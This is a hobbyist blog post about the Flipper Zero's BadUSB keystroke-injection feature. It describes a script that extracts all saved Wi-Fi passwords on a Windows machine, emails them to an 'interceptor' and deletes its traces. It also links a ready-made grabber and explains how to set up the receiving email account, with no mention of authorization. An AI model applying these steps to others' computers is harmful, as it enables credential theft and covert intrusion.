You might be wondering what the heck this gadget is. This device is called a Flipper zero and as one of the early Kickstarter backers, I am one of the few thousand proud owners of this gizmo, as of this writing. In a nutshell, Flipper Zero is a wireless analyzer device, capable of analyzing, capturing, and replicating wireless frequencies, RFID data, and more. As I write this, mass amounts of data by Flipper Zero owners are being contributed to Github repositories. Databases of brand name TVs and their wireless remote codes is one example. Some consider the Flipper Zero's capabilities to currently be in their infancy, with firmware updates releasing on what seems like a near weekly basis as of late. You can get a firsthand look at the collaboration already in full steam by Flipper Zero owners over at their Discord channel : https://flipperzero.one/discord
The Discord is separated into sub-channels that relate to each feature of the device (e.g. The infrared remote capability, the SubGHZ capability, the BadUSB capability, etc).
This device can scan NFC chips for data as well as RFID cards, badges, and fobs. It can also replicate wireless codes and by virtue of this, control ceiling fans, TVs, and more with it's SubGHZ and Infrared functionality. But it's abilities don't stop there. It can also be used as a "BadUSB", which utilizes Rubber Ducky Scripts.
By plugging the Flipper Zero into a computer (either Mac or PC, depending on the script you've written) and choosing the BadUSB option, you can choose to "Run" any of the scripts you've saved. We are provided with a demo script for both Windows and Mac by the developers of Flipper Zero, but what if we want to create our own? How do we do that? And what can these scripts truly do?
The idea of Bad USB/Rubber ducky scripts is that a device that has this feature, when plugged into a computer, tricks the computer into thinking that this device (which could either look like a conventional USB flash drive or in our case, our nifty Flipper Zero) is not a USB stick at all but rather a keyboard. The genius of these devices is that they are essentially keyboards that have a brain. That "brain" equates to the script you've prewritten and loaded onto it. So as soon as this imposter of a keyboard is plugged in (and in our case of the Flipper Zero, the specific script is selected to run), it goes to work executing said script and essentially taking control of the target computer as if there was a ghost in the room.
So what can that script do? Well, essentially anything. Aside from the more tech-savy and old school computer geeks out there, most of us can’t imagine using a computer without a touchpad or a mouse, but the reality is that all the data on your computer is accessible via command prompt in Windows or the terminal window in Mac and in the world of these non-GUI interfaces, no mouse is needed. These non-graphic terminal windows were the precursor to the modern-day graphic user interface we all know and love and yet, they still exist as an ancillary feature that runs under the hood, should we ever need or decide to use it.
Rubber Ducky Scripts for Windows, as an example, might begin with a “Windows+R key” command (written in Rubber Ducky script as "GUI R") to open the Run window in the Windows OS. From there, they go on to the next pre-scripted command, which might be “notepad.exe”. This opens the Notepad app from the Run window. Then, maybe we want it to display a message such as “Hello world!!”. Or the script could jump from that Run window over to cmd.exe (the Windows command prompt).
If you’re wondering just what can be accessed from Command Prompt in Windows, well…the sky is the limit. It could be scripted to open popular applications, certainly those bundled with Windows, It could be used to access Windows' Registry editor (essentially the backbone of the OS, which contains settings for the entire system) to collect information or make changes. It could even tap into the windows files that contain saved SSID (Wireless networks) passwords and then be automated via the script to save those to a new file and email that file to an interceptor’s email. The email then arrives to the interceptor with an attachment of cleartext passwords for any private wifi network the laptop has EVER connected to.
If you happen to be the lucky owner of a Flipper Zero, you can follow this fantastic tutorial video by Ut4y0 to learn how to get set up for writing a Ducky script for your Flipper: https://www.youtube.com/watch?v=rf5UJFMSGtE )
The above video explains how to write Rubber Ducky Scripts in Notepad++. Think of Notepad++ as the evolution of the simple Notepad app we are all accustomed to on Windows. It’s used by programmers to better organize the syntax they are typing out and has automatic color coding that applies to text it recognizes as defined variables or commands for that particular language. There’s more to it than just that, but I am only interested in scratching the surface of this app for the purpose of this post.
Before you can write a Rubber Ducky Script, you need to download something called a User Defined Language file. This type of file comes in XML format and contains knowledge that Notepad++ needs in order to recognize the syntax you’re inputting as being that of the Duckyscript programming language (in this case).
Once that is imported into Notepad++ and selected as the language in use, you’re ready to go. Below is a sample of a very basic Ducky script. All this one does is use GUI R (Windows Key +R) to open Notepad and display the text “You’ve been Rubber Duckied courtesy of the Flipper Zero you just plugged in!”
And here is a much more complicated script:
(We see that this script uses GUI D (Windows key+D) to force display the desktop to ensure that the ensuing commands get applied to the proper part of the OS instead of getting hung up and executing the code to an unwanted area in any already-opened app. This one once again uses GUI R to open the Run window, but this time we’ve got much more powerful intentions than just displaying a message via Notepad. Notice that it has launched the Command Prompt and is accessing WIFI network names and passwords of all saved networks the machine has ever remembered. But this script goes even further than that, compiling this information and then sending it out to an interceptor’s email with a zip file attachment that contains all the credentials in the form of xml files that can be downloaded and then opened right in your browser. Lastly, this script even deletes the directory it created initially as part of the process. This cleanup measure is an important step in the data exfiltration process.
If you're wondering why you keep seeing "DELAY" throughout the scripts, it is used as sort of a safety buffer to ensure that there is proper pacing going on for the computer to recognize the superspeed commands being entered by our Flipper Zero's Rubber Ducky Script. If DELAYs were not used or were too short, the script would error out and the computer would simply not be able to process the sheer magnitude of characters and commands being thrown at it. This is also dependent on the speed of the computer, but when creating these scripts, the idea is to make them as universally effective as possible against any target computer, be it a slow or fast one.
If you’d like to take advantage of a pre-made WifiGrabber script, look no further than this one, courtesy of Giorman101:
https://github.com/Gioman101/BadUSBwifi-grabberFlipper
*You will need to enter your email address and your email password in place of the placeholders in the script to intercept the zip file containing the creds that it sends out. Please also note that for this to work with a gmail email, you will need to have Google generate a random third party app password for you for use of this functionality. You can do so by navigating to this page https://myaccount.google.com/security , then proceeding to sign in and click "App Passwords" section. Google may be stripping this feature away in May of 2022, so it is possible that beyond that date, this may only work with emails set up outside of the realm of Google/gmail (alternatives include Outlook email addresses, which are now free at their base level, as well as Proton email addresses) If using an alternative to gmail, a handy list of mail server addresses and ports can be found here: https://www.arclab.com/en/kb/email/list-of-smtp-and-pop3-servers-mailserver-list.html#:~:text=Email%20Marketing%20and%20Newsletters%20made%20easy%20...%20,sure%2C%20that%20POP3%20access%20is%20en%20...%20 This alternative server/email provider info will also need to be used to fill in placeholders in the event of a non-gmail email.
No comments:
Post a Comment